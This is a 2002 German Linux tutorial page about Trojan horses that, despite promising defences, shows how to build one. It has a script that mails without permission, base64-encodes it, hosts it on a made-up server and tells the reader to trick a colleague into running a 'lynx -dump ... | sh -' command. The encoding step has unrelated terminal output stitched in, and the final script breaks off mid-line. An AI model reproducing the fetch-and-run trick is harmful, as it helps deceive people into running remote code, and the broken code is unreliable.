Tux L i n u x * G u i d e

v o n * I n g o * B l e c h s c h m i d t * ( c ) * 2 0 0 1
Tux
|Home|

|Neue Artikel|

|Index|

|Liste|

|Code-Snippets|

|Links|

|Allgemeines|

|Cool Stuff|
Trojanische Pferde
Don Apr 18 19:28:01 MEST 2002
Trojanisches_Pferd Pferd Troia Troja mimencode uuencode uudecode Virus

Dieser Artikel erläutert die vielen Möglichkeiten Trojanischer Pferde, und wie man sie abwehren kann.

LinuxGuide Druckbare Version
Man-Page
Sourcecode
Verwandte Artikel:

Versteckte Nachrichten
Sichere Passwörter generieren



      .~.   
      /V\   
     // \\  
    /(   )\ 
     ^`~'^  
     


Hosted at Sorceforge.net
No ePATENTS
Viewable With Any Browser
Burn All GIFs!

D
er Name "Trojanisches Pferd" kommt von der Antike: Volk A belagert Stadt B, kommt aber nicht hinein. Held C kommt auf die Idee, ein großes mit eigenen Soldaten besetztes Holzpferd zu bauen und es B zu überlassen. B fällt auf den Trick hinein und wird erobert.
Heute wird ein Programm, welches vorgibt, ein Spiel oder sonstiges wichtiges Programm zu sein, dem Computer schadet und/oder seinem Besitzer wertvolle Daten liefert. In M$ Windows ist es im Allgemeinen nicht schwer, ein Programm wie E-Mail zu verschicken, welches dann die Schadensfunktion(en) ausführt (via Outlook sogar automatisch). In Linux ist das was anderes: Binärprogramme laufen i.d.R. nur auf der Distribution, auf der sie kompiliert wurden. Und Shellskripte sind zu einsichtig: Jeder Befehl, der ausgeführt wird, kann (vor dem Start) eingesehen werden. Vorläufiges Fazit: Trojanische Pferde unter Linux sind unmöglich.
Leider ist dieses "unmöglich" etwas übertrieben: Für Newbies, das heißt Linuxern, die sich noch nicht so viel Wissen besitzen, ist es möglich: Hier ist der Quellcode für ein Programm, welches (ohne Erlaubnis des Benutzers) eine E-Mail verschickt:
# E-Mail unerlaubt versenden
 
echo 'Hallo, Welt!' | mail -s .,-+= foo@bar.org
 
 

Wenn man nun das Programm mit uuencode "verschlüsselt", erhält man:
# Verschlüsselung
 
Enter verification password: 
Today is Pungenday, the 35th day of Discord in the YOLD 3168.
P'tang!
     15 neue Mails:
Subject: Fwd: E-Kettenbriefe
Subject: E-Kettenbriefe
Subject: A
Subject: Bingo!
Subject: News
Anzahl Sekunden seit 1970: 1019151653
iblech@Hitachi:~/tLipps > cat Pfad/zum/Quelltext | uuencode -m - > /Pfad/zum/Er gebnis 
 
 

Man erhält zum Beispiel:
# Zwischenergebnis
 
begin-base64 644 -
ZWNobyAiSGFsbG8sIFdlbHQiIHwgbWFpbCAtcyAuLC0rPSBmb29AYmFyLm9y
Zwo=
====
 
 

Nun muss man nur noch zwei Zeilen hinzufügen, und dann zum Beispiel auf einen Webserver stellen (im Beispiel AlphaCentauti.univer.sum):
# Endergebnis, abzuspeichern in http://AlphaCentauri.univer.sum/troia
 
cat <
 
 

Dann muss man nur noch dem lieben Kollegen sagen... "Ich habe ein witziges Programm im Internet entdeckt. Wenn du es ausführen willst, musst du nur 'lynx -dump http://AlphaCentauri.univer.sum/troia | sh -' eingeben!"
Viel Spaß beim mimencoden...

Document Informations: Content-Type: text/html; charset=iso-8859-1
Author: Ingo Blechschmidt
Description: LinuxGuide - Dieser Artikel erläutert die vielen Möglichkeiten Trojanischer Pferde, und wie man sie abwehren kann.
Keywords: Trojanisches_Pferd, Pferd, Troia, Troja, mimencode, uuencode, uudecode, Virus, LinuxGuide
Robots: all
Copyright: Copyright (C) 2002 by Ingo Blechschmidt
Date: 2003-04-18T19:28:01+02:00

Stichwortverzeichnis | Neue Artikel | Übersicht | Codesnippets | Links | Copyright | Cool Stuff | Home | Druckbare Version | Manpage | Sourcecode |
Diesen Artikel kritisieren, kommentieren oder ergänzen
Einen Neuen Artikel schreiben

 
This website is distributed under the GNU Free Documentation License .